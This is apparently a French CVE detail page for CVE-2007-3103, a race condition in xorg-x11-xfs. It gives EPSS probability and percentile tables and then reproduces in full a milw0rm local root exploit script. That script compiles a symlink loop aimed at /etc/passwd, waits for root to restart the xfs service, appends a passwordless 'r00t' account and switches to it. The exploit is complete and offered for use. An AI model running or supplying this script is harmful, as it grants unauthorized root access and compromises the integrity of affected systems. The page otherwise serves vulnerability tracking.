CVE-2007-3103 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.22%	–	–
2022-02-13	–	–	3.22%	–	–
2022-04-03	–	–	3.22%	–	–
2022-09-18	–	–	3.22%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-09-15	–	–	–	0.04%	–
2024-12-08	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.08%
2025-03-30	–	–	–	–	0.08%
2025-04-06	–	–	–	–	0.08%
2025-04-06	–	–	–	–	0.08,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	65%
2022-02-13	66%
2022-04-03	83%
2022-09-18	84%
2023-03-12	–
2024-06-02	–
2024-09-15	5%
2024-12-08	–
2025-01-19	–
2025-03-18	21%
2025-03-30	2%
2025-04-06	21%
2025-04-06	21%

#!/bin/sh # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) # # Another lame xploit by vl4dZ :)) works on redhat el5 and before # # $ id # uid=1001(kecos) gid=1001(user) groups=1001(user) # $ sh xfs-RaceCondition-root-exploit.sh # [*] Generate large data file in /tmp/.font-unix # [*] Wait for xfs service to be (re)started by root... # [*] Hop, symlink created... # [*] Launching root shell # -sh-3.1# id # uid=0(root) gid=0(root) groups=0(root) # Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is # located in the start() function of the /etc/init.d/xfs script: # ... # rm -rf $FONT_UNIX_DIR # mkdir $FONT_UNIX_DIR # chown root:root $FONT_UNIX_DIR # chmod 1777 $FONT_UNIX_DIR # ... # I'm listening right now to nice free music: # http://www.jamendo.com/fr/album/5919 FontDir="/tmp/.font-unix" Zero=/dev/zero Size=900000 if [ ! -d $FontDir ]; then printf "Is xfs running ?\n" exit 1 fi cd /tmp cat > sym.c << EOF #include <unistd.h> int main(){ for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0) {return 0;}}} EOF cc sym.c -o sym>/dev/null 2>&1 if [ $? != 0 ]; then printf "Error: Cant compile code" exit 1 fi printf "[*] Generate large data file in $FontDir\n" dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1 if [ $? != 0 ]; then printf "Error: cant create large file" exit 1 fi printf "[*] Wait for xfs service to be (re)started by root...\n" ./sym if [ $? != 0 ]; then printf "Error: code failed...\n" exit 1 fi if [ -L /tmp/.font-unix ]; then printf "[*] Hop, symlink created...\n" printf "[*] Launching root shell\n" sleep 2 rm -f /tmp/.font-unix echo "r00t::0:0::/:/bin/sh" >> /etc/passwd fi su - r00t # milw0rm.com [2008-02-21]